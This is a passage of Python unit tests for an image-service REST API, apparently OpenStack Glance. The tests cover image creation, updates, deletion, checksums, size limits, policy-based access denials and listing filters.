self._do_test_post_image_content_missing_format(\'disk_format\')\n\n def test_post_image_content_missing_container_type(self):\n """"""Tests creation of an image with missing container format""""""\n self._do_test_post_image_content_missing_format(\'container_format\')\n\n def _do_test_put_image_content_missing_format(self, missing):\n """"""Tests delayed activation of an image with missing format""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n header = \'x-image-meta-\' + missing.replace(\'_\', \'-\')\n\n del fixture_headers[header]\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_put_image_content_missing_disk_format(self):\n """"""Tests delayed activation of image with missing disk format""""""\n self._do_test_put_image_content_missing_format(\'disk_format\')\n\n def test_put_image_content_missing_container_type(self):\n """"""Tests delayed activation of image with missing container format""""""\n self._do_test_put_image_content_missing_format(\'container_format\')\n\n def test_update_deleted_image(self):\n """"""Tests that exception raised trying to update a deleted image""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n fixture = {\'name\': \'test_del_img\'}\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n self.assertTrue(\'Forbidden to update deleted image\' in res.body)\n\n def test_delete_deleted_image(self):\n """"""Tests that exception raised trying to delete a deleted image""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the status is deleted\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""deleted"", res.headers[\'x-image-meta-status\'])\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n msg = ""Image %s not found."" % UUID2\n self.assertTrue(msg in res.body)\n\n # Verify the status is still deleted\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""deleted"", res.headers[\'x-image-meta-status\'])\n\n def test_delete_pending_delete_image(self):\n """"""\n Tests that correct response returned when deleting\n a pending_delete image\n """"""\n # First deletion\n self.config(delayed_delete=True, scrubber_datadir=\'/tmp/scrubber\')\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the status is pending_delete\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""pending_delete"", res.headers[\'x-image-meta-status\'])\n\n # Second deletion\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n self.assertTrue(\'Forbidden to delete a pending_delete image\'\n in res.body)\n\n # Verify the status is still pending_delete\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""pending_delete"", res.headers[\'x-image-meta-status\'])\n\n def test_register_and_upload(self):\n """"""\n Test that the process of registering an image with\n some metadata, then uploading an image file with some\n more metadata doesn\'t mark the original metadata deleted\n :see LP Bug#901534\n """"""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-property-key1\': \'value1\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n res_body = json.loads(res.body)[\'image\']\n\n self.assertTrue(\'id\' in res_body)\n\n image_id = res_body[\'id\']\n self.assertTrue(\'/images/%s\' % image_id in res.headers[\'location\'])\n\n # Verify the status is queued\n self.assertTrue(\'status\' in res_body)\n self.assertEqual(\'queued\', res_body[\'status\'])\n\n # Check properties are not deleted\n self.assertTrue(\'properties\' in res_body)\n self.assertTrue(\'key1\' in res_body[\'properties\'])\n self.assertEqual(\'value1\', res_body[\'properties\'][\'key1\'])\n\n # Now upload the image file along with some more\n # metadata and verify original metadata properties\n # are not marked deleted\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.headers[\'x-image-meta-property-key2\'] = \'value2\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the status is queued\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertTrue(\'x-image-meta-property-key1\' in res.headers,\n ""Did not find required property in headers. ""\n ""Got headers: %r"" % res.headers)\n self.assertEqual(""active"", res.headers[\'x-image-meta-status\'])\n\n def test_disable_purge_props(self):\n """"""\n Test the special x-glance-registry-purge-props header controls\n the purge property behaviour of the registry.\n :see LP Bug#901534\n """"""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-property-key1\': \'value1\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n res_body = json.loads(res.body)[\'image\']\n\n self.assertTrue(\'id\' in res_body)\n\n image_id = res_body[\'id\']\n self.assertTrue(\'/images/%s\' % image_id in res.headers[\'location\'])\n\n # Verify the status is queued\n self.assertTrue(\'status\' in res_body)\n self.assertEqual(\'active\', res_body[\'status\'])\n\n # Check properties are not deleted\n self.assertTrue(\'properties\' in res_body)\n self.assertTrue(\'key1\' in res_body[\'properties\'])\n self.assertEqual(\'value1\', res_body[\'properties\'][\'key1\'])\n\n # Now update the image, setting new properties without\n # passing the x-glance-registry-purge-props header and\n # verify that original properties are marked deleted.\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-property-key2\'] = \'value2\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the original property no longer in headers\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertTrue(\'x-image-meta-property-key2\' in res.headers,\n ""Did not find required property in headers. ""\n ""Got headers: %r"" % res.headers)\n self.assertFalse(\'x-image-meta-property-key1\' in res.headers,\n ""Found property in headers that was not expected. ""\n ""Got headers: %r"" % res.headers)\n\n # Now update the image, setting new properties and\n # passing the x-glance-registry-purge-props header with\n # a value of ""false"" and verify that second property\n # still appears in headers.\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-property-key3\'] = \'value3\'\n req.headers[\'x-glance-registry-purge-props\'] = \'false\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the second and third property in headers\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertTrue(\'x-image-meta-property-key2\' in res.headers,\n ""Did not find required property in headers. ""\n ""Got headers: %r"" % res.headers)\n self.assertTrue(\'x-image-meta-property-key3\' in res.headers,\n ""Did not find required property in headers. ""\n ""Got headers: %r"" % res.headers)\n\n def test_publicize_image_unauthorized(self):\n """"""Create a non-public image then fail to make public""""""\n rules = {""add_image"": \'@\', ""publicize_image"": \'!\'}\n self.set_policy_rules(rules)\n\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-is-public\': \'false\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'PUT\'\n req.headers[\'x-image-meta-is-public\'] = \'true\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_update_image_size_header_too_big(self):\n """"""Tests raises BadRequest for supplied image size that is too big""""""\n fixture_headers = {\'x-image-meta-size\': CONF.image_size_cap + 1}\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'PUT\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_update_image_size_data_too_big(self):\n self.config(image_size_cap=512)\n\n fixture_headers = {\'content-type\': \'application/octet-stream\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'PUT\'\n\n req.body = \'X\' * (CONF.image_size_cap + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_update_image_size_chunked_data_too_big(self):\n self.config(image_size_cap=512)\n\n # Create new image that has no data\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.headers[\'x-image-meta-name\'] = \'something\'\n req.headers[\'x-image-meta-container_format\'] = \'ami\'\n req.headers[\'x-image-meta-disk_format\'] = \'ami\'\n res = req.get_response(self.api)\n image_id = json.loads(res.body)[\'image\'][\'id\']\n\n fixture_headers = {\n \'content-type\': \'application/octet-stream\',\n \'transfer-encoding\': \'chunked\',\n }\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n\n req.body_file = StringIO.StringIO(\'X\' * (CONF.image_size_cap + 1))\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_update_non_existing_image(self):\n self.config(image_size_cap=100)\n\n req = webob.Request.blank(""images/%s"" % _gen_uuid)\n req.method = \'PUT\'\n req.body = \'test\'\n req.headers[\'x-image-meta-name\'] = \'test\'\n req.headers[\'x-image-meta-container_format\'] = \'ami\'\n req.headers[\'x-image-meta-disk_format\'] = \'ami\'\n req.headers[\'x-image-meta-is_public\'] = \'False\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 404)\n\n def test_update_public_image(self):\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-is-public\': \'true\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'PUT\'\n req.headers[\'x-image-meta-name\'] = \'updated public image\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n def test_get_index_sort_name_asc(self):\n """"""\n Tests that the /images registry API returns list of\n public images sorted alphabetically by name in\n ascending order.\n """"""\n UUID3 = _gen_uuid()\n extra_fixture = {\'id\': UUID3,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'name\': \'asdf\',\n \'size\': 19,\n \'checksum\': None}\n\n db_api.image_create(self.context, extra_fixture)\n\n UUID4 = _gen_uuid()\n extra_fixture = {\'id\': UUID4,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'name\': \'xyz\',\n \'size\': 20,\n \'checksum\': None}\n\n db_api.image_create(self.context, extra_fixture)\n\n req = webob.Request.blank(\'/images?sort_key=name&sort_dir=asc\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n\n images = res_dict[\'images\']\n self.assertEquals(len(images), 3)\n self.assertEquals(images[0][\'id\'], UUID3)\n self.assertEquals(images[1][\'id\'], UUID2)\n self.assertEquals(images[2][\'id\'], UUID4)\n\n def test_get_details_filter_changes_since(self):\n """"""\n Tests that the /images/detail registry API returns list of\n public images that have a size less than or equal to size_max\n """"""\n dt1 = timeutils.utcnow() - datetime.timedelta(1)\n iso1 = timeutils.isotime(dt1)\n\n date_only1 = dt1.strftime(\'%Y-%m-%d\')\n date_only2 = dt1.strftime(\'%Y%m%d\')\n date_only3 = dt1.strftime(\'%Y-%m%d\')\n\n dt2 = timeutils.utcnow() + datetime.timedelta(1)\n iso2 = timeutils.isotime(dt2)\n\n image_ts = timeutils.utcnow() + datetime.timedelta(2)\n hour_before = image_ts.strftime(\'%Y-%m-%dT%H:%M:%S%%2B01:00\')\n hour_after = image_ts.strftime(\'%Y-%m-%dT%H:%M:%S-01:00\')\n\n dt4 = timeutils.utcnow() + datetime.timedelta(3)\n iso4 = timeutils.isotime(dt4)\n\n UUID3 = _gen_uuid()\n extra_fixture = {\'id\': UUID3,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'name\': \'fake image #3\',\n \'size\': 18,\n \'checksum\': None}\n\n db_api.image_create(self.context, extra_fixture)\n db_api.image_destroy(self.context, UUID3)\n\n UUID4 = _gen_uuid()\n extra_fixture = {\'id\': UUID4,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'ami\',\n \'container_format\': \'ami\',\n \'name\': \'fake image #4\',\n \'size\': 20,\n \'checksum\': None,\n \'created_at\': image_ts,\n \'updated_at\': image_ts}\n\n db_api.image_create(self.context, extra_fixture)\n\n # Check a standard list, 4 images in db (2 deleted)\n req = webob.Request.blank(\'/images/detail\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 2)\n self.assertEqual(images[0][\'id\'], UUID4)\n self.assertEqual(images[1][\'id\'], UUID2)\n\n # Expect 3 images (1 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' % iso1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 3)\n self.assertEqual(images[0][\'id\'], UUID4)\n self.assertEqual(images[1][\'id\'], UUID3) # deleted\n self.assertEqual(images[2][\'id\'], UUID2)\n\n # Expect 1 images (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' % iso2)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 1)\n self.assertEqual(images[0][\'id\'], UUID4)\n\n # Expect 1 images (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' %\n hour_before)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 1)\n self.assertEqual(images[0][\'id\'], UUID4)\n\n # Expect 0 images (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' %\n hour_after)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 0)\n\n # Expect 0 images (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' % iso4)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 0)\n\n for param in [date_only1, date_only2, date_only3]:\n # Expect 3 images (1 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' %\n param)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 3)\n self.assertEqual(images[0][\'id\'], UUID4)\n self.assertEqual(images[1][\'id\'], UUID3) # deleted\n self.assertEqual(images[2][\'id\'], UUID2)\n\n # Bad request (empty changes-since param)\n req = webob.Request.blank(\'/images/detail?changes-since=\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_get_images_bad_urls(self):\n """"""Check that routes collections are not on (LP bug 1185828)""""""\n req = webob.Request.blank(\'/images/detail.xxx\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n req = webob.Request.blank(\'/images.xxx\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n req = webob.Request.blank(\'/images/new\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n req = webob.Request.blank(""/images/%s/members"" % UUID1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(""/images/%s/members.xxx"" % UUID1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_get_images_detailed_unauthorized(self):\n rules = {""get_images"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(\'/images/detail\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_get_images_unauthorized(self):\n rules = {""get_images"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(\'/images/detail\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_store_location_not_revealed(self):\n """"""\n Test that the internal store location is NOT revealed\n through the API server\n """"""\n # Check index and details...\n for url in (\'/images\', \'/images/detail\'):\n req = webob.Request.blank(url)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n\n images = res_dict[\'images\']\n num_locations = sum([1 for record in images\n if \'location\' in record.keys()])\n self.assertEquals(0, num_locations, images)\n\n # Check GET\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertFalse(\'X-Image-Meta-Location\' in res.headers)\n\n # Check HEAD\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertFalse(\'X-Image-Meta-Location\' in res.headers)\n\n # Check PUT\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.body = res.body\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n res_body = json.loads(res.body)\n self.assertFalse(\'location\' in res_body[\'image\'])\n\n # Check POST\n req = webob.Request.blank(""/images"")\n headers = {\'x-image-meta-location\': \'http://localhost\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n for k, v in headers.iteritems():\n req.headers[k] = v\n req.method = \'POST\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 201)\n res_body = json.loads(res.body)\n self.assertFalse(\'location\' in res_body[\'image\'])\n\n def test_image_is_checksummed(self):\n """"""Test that the image contents are checksummed properly""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n image_contents = ""chunk00000remainder""\n image_checksum = hashlib.md5(image_contents).hexdigest()\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = image_contents\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(image_checksum, res_body[\'checksum\'],\n ""Mismatched checksum. Expected %s, got %s"" %\n (image_checksum, res_body[\'checksum\']))\n\n def test_etag_equals_checksum_header(self):\n """"""Test that the ETag header matches the x-image-meta-checksum""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n image_contents = ""chunk00000remainder""\n image_checksum = hashlib.md5(image_contents).hexdigest()\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = image_contents\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n image = json.loads(res.body)[\'image\']\n\n # HEAD the image and check the ETag equals the checksum header...\n expected_headers = {\'x-image-meta-checksum\': image_checksum,\n \'etag\': image_checksum}\n req = webob.Request.blank(""/images/%s"" % image[\'id\'])\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n for key in expected_headers.keys():\n self.assertTrue(key in res.headers,\n ""required header \'%s\' missing from ""\n ""returned headers"" % key)\n for key, value in expected_headers.iteritems():\n self.assertEquals(value, res.headers[key])\n\n def test_bad_checksum_prevents_image_creation(self):\n """"""Test that the image contents are checksummed properly""""""\n image_contents = ""chunk00000remainder""\n bad_checksum = hashlib.md5(""invalid"").hexdigest()\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-checksum\': bad_checksum,\n \'x-image-meta-is-public\': \'true\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = image_contents\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n # Test that only one image was returned (that already exists)\n req = webob.Request.blank(""/images"")\n req.method = \'GET\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n images = json.loads(res.body)[\'images\']\n self.assertEqual(len(images), 1)\n\n def test_image_meta(self):\n """"""Test for HEAD /images/""""""\n expected_headers = {\'x-image-meta-id\': UUID2,\n \'x-image-meta-name\': \'fake image #2\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n for key, value in expected_headers.iteritems():\n self.assertEquals(value, res.headers[key])\n\n def test_image_meta_unauthorized(self):\n rules = {""get_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_show_image_basic(self):\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(res.content_type, \'application/octet-stream\')\n self.assertEqual(\'chunk00000remainder\', res.body)\n\n def test_show_non_exists_image(self):\n req = webob.Request.blank(""/images/%s"" % _gen_uuid())\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_show_image_unauthorized(self):\n rules = {""get_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 403)\n\n def test_show_image_unauthorized_download(self):\n rules = {""download_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 403)\n\n def test_delete_image(self):\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.body, \'\')\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404,\n res.body)\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.headers[\'x-image-meta-deleted\'], \'True\')\n self.assertEquals(res.headers[\'x-image-meta-status\'], \'deleted\')\n\n def test_delete_non_exists_image(self):\n req = webob.Request.blank(""/images/%s"" % _gen_uuid())\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_delete_not_allowed(self):\n # Verify we can get the image data\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.headers[\'X-Auth-Token\'] = \'user:tenant:\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(len(res.body), 19)\n\n # Verify we cannot delete the image\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 403)\n\n # Verify the image data is still there\n req.method = \'GET\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(len(res.body), 19)\n\n def test_delete_queued_image(self):\n """"""Delete an image in a queued state\n\n Bug #747799 demonstrated that trying to DELETE an image\n that had had its save process killed manually results in failure\n because the location attribute is None.\n\n Bug #1048851 demonstrated that the status was not properly\n being updated to \'deleted\' from \'queued\'.\n """"""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n\n # Now try to delete the image...\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s\' % res_body[\'id\'])\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.headers[\'x-image-meta-deleted\'], \'True\')\n self.assertEquals(res.headers[\'x-image-meta-status\'], \'deleted\')\n\n def test_delete_queued_image_delayed_delete(self):\n """"""Delete an image in a queued state when delayed_delete is on\n\n Bug #1048851 demonstrated that the status was not properly\n being updated to \'deleted\' from \'queued\'.\n """"""\n self.config(delayed_delete=True)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n\n # Now try to delete the image...\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s\' % res_body[\'id\'])\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.headers[\'x-image-meta-deleted\'], \'True\')\n self.assertEquals(res.headers[\'x-image-meta-status\'], \'deleted\')\n\n def test_delete_protected_image(self):\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-protected\': \'True\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n\n # Now try to delete the image...\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_delete_image_unauthorized(self):\n rules = {""delete_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_get_details_invalid_marker(self):\n """"""\n Tests that the /images/detail registry API returns a 400\n when an invalid marker is provided\n """"""\n req = webob.Request.blank(\'/images/detail?marker=%s\' % 